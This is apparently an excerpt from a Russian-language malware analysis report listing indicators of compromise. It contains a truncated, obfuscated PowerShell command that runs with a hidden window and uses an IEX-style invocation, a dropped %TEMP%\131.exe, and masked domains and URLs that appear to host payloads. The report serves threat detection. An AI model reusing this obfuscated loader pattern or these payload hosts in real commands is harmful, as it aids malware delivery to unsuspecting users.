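Техническая информация

Примечание: подзаголовки разделов в этом фрагменте не сохранились, поэтому повторяющиеся строки (например, %TEMP%\131.exe и командная строка PowerShell), вероятно, относятся к разным разделам отчёта. Символы «#» в именах доменов, по-видимому, являются маскировкой, применённой в источнике, а командная строка PowerShell обрезана («...»). В таком виде эти значения не годятся для точного сопоставления в правилах обнаружения или блокировки.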
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $sHElLiD[1]+$shelLiD[13]+'x')( "$( sET-vAriaBle 'ofS' '' ) "+ [stRINg]('0%116{94}82r25z74k65,83%9,75z70,78k65E71k80k4r106_65%80{10z115%65{70z103r72E77}65_74z80,31_0{103_78k66z25k3,76z80}80...
- %TEMP%\131.exe
- %TEMP%\131.exe
- %TEMP%\131.exe
- 'bo####calhenna.com':80
- 'fl###nghead.net':80
- 'ix###ine.com':80
- 'ix####sallison.com':80
- 'fl###nghead.net':443
- 'pk#.goog':80
- 'ma####yamithra.com':80
- http://www.bo####calhenna.com/Ejfm/
- http://www.fl###nghead.net/AoU7x/
- http://ix###ine.com/
- http://ix####sallison.com/
- http://www.ix####sallison.com/
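- http://pk#.goog/gsr1/gsr1.crt (запрос файла сертификата .crt; вероятно, побочный эффект проверки цепочки сертификатов при TLS-соединении, а не обращение к инфраструктуре вредоносной программы; перед использованием в качестве индикатора требует проверки)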
- http://www.ma####yamithra.com/COQIZ/
- 'fl###nghead.net':443
- DNS ASK bo####calhenna.com
- DNS ASK fl###nghead.net
- DNS ASK ix###ine.com
- DNS ASK ix####sallison.com
- DNS ASK pk#.goog
- DNS ASK fe###nde.org
- DNS ASK ma####yamithra.com
- DNS ASK kk##s.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $sHElLiD[1]+$shelLiD[13]+'x')( "$( sET-vAriaBle 'ofS' '' ) "+ [stRINg]('0%116{94}82r25z74k65,83%9,75z70,78k65E71k80k4r106_65%80{10z115%65{70z103r72E77}65_74z80,31_0{103_78k66z25k3,76z80}80...' (со скрытым окном)